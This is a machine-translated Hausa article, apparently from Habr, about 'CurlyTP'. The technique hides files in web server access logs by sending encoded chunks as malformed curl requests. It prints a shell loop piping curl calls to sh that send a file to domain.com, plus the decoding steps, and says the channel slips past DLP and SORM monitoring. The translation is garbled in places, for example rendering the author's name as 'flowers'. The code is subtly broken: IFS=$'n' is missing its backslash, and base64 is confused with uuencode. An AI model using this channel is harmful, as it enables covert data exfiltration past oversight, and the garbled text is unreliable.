Bisa ga ma'anar Wikipedia, mataccen digo kayan aiki ne na makirci wanda ke yin amfani da musayar bayanai ko wasu abubuwa tsakanin mutane masu amfani da wurin ɓoye. Manufar ita ce mutane ba su taɓa saduwa ba - amma har yanzu suna musayar bayanai don kiyaye amincin aiki.

Bai kamata wurin ɓoye ya jawo hankali ba. Saboda haka, a cikin layi na layi suna amfani da abubuwa masu hankali: bulo maras kyau a bango, littafin ɗakin karatu, ko rami a cikin bishiya.

Akwai kayan aikin ɓoyewa da ɓoye da yawa akan Intanet, amma ainihin amfani da waɗannan kayan aikin yana jan hankali. Bugu da kari, ana iya toshe su a matakin kamfani ko na gwamnati. Me za a yi?

Mai haɓaka Ryan Flowers ya ba da shawarar zaɓi mai ban sha'awa - yi amfani da kowane sabar gidan yanar gizo azaman wurin ɓoyewa. Idan kuna tunani game da shi, menene sabar gidan yanar gizo ke yi? Yana karɓar buƙatun, yana fitar da fayiloli kuma yana rubuta rajistan ayyukan. Kuma yana tattara duk buƙatun, har ma da ba daidai ba!

Ya bayyana cewa kowane sabar gidan yanar gizo yana ba ku damar adana kusan kowane saƙo a cikin log ɗin. Furanni sun yi mamakin yadda ake amfani da wannan.

Ya ba da wannan zaɓi:

1. Ɗauki fayil ɗin rubutu (saƙon sirri) kuma ƙididdige hash (md5sum).
2. Muna shigar da shi (gzip+uuencode).
3. Muna rubutawa ga log ɗin ta amfani da buƙatun da ba daidai ba da gangan ga uwar garken.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Don karanta fayil, kuna buƙatar aiwatar da waɗannan ayyukan ta hanyar juzu'i: yanke lambar kuma buɗe fayil ɗin, bincika zanta (ana iya watsa zanta cikin aminci ta hanyar buɗe tashoshi).

Ana maye gurbin sarari da =+=ta yadda babu sarari a cikin adireshin. Shirin, wanda marubucin ya kira CurlyTP, yana amfani da bayanan tushe64, kamar haɗe-haɗe na imel. An yi buƙatar tare da kalmar maɓalli ?transfer?ta yadda mai karɓa zai iya samun sauƙin samunsa a cikin rajistan ayyukan.

Menene muke gani a cikin rajistan ayyukan a cikin wannan harka?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Kamar yadda aka riga aka ambata, don karɓar saƙon sirri kuna buƙatar aiwatar da ayyukan ta hanyar juyawa:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Tsarin yana da sauƙin sarrafa kansa. Md5sum yayi daidai, kuma abubuwan da ke cikin fayil ɗin sun tabbatar da cewa an tsara komai daidai.

Hanyar yana da sauqi qwarai. "Batun wannan darasi shine kawai don tabbatar da cewa ana iya canja wurin fayiloli ta hanyar buƙatun yanar gizo marasa laifi, kuma yana aiki akan kowane sabar gidan yanar gizo tare da bayanan rubutu. Mahimmanci, kowane sabar gidan yanar gizo wurin buya ne!” in ji Flowers.

Tabbas, hanyar tana aiki ne kawai idan mai karɓa yana da damar shiga rajistan ayyukan sabar. Amma ana ba da irin wannan damar, alal misali, ta yawancin masu karɓar baƙi.

Yadda za a yi amfani da shi?

Ryan Flowers ya ce shi ba kwararre kan harkokin tsaro ba ne kuma ba zai tattara jerin yuwuwar amfani da CurlyTP ba. A gare shi, kawai hujja ce ta ra'ayi cewa sanannun kayan aikin da muke gani kowace rana za a iya amfani da su ta hanyar da ba ta dace ba.

A zahiri, wannan hanyar tana da fa'idodi da yawa akan sauran uwar garken “boye” kamar Dijital Dead Drop ko PirateBox: ba ya buƙatar saiti na musamman a gefen uwar garken ko kowane ƙa'idodi na musamman - kuma ba zai haifar da tuhuma a tsakanin waɗanda ke sa ido kan zirga-zirgar ababen hawa ba. Yana da wuya tsarin SORM ko DLP zai bincika URLs don fayilolin rubutu da aka matsa.

Wannan yana ɗaya daga cikin hanyoyin isar da saƙonni ta fayilolin sabis. Kuna iya tuna yadda wasu kamfanoni masu ci gaba suka kasance suna sanyawa Ayyukan Masu Haɓakawa a cikin Masu Magana na HTTP ko a cikin code na shafukan HTML.

Manufar ita ce kawai masu haɓaka gidan yanar gizo za su ga wannan kwai na Ista, tunda mutum na yau da kullun ba zai kalli rubutun kai ko lambar HTML ba.

source: www.habr.com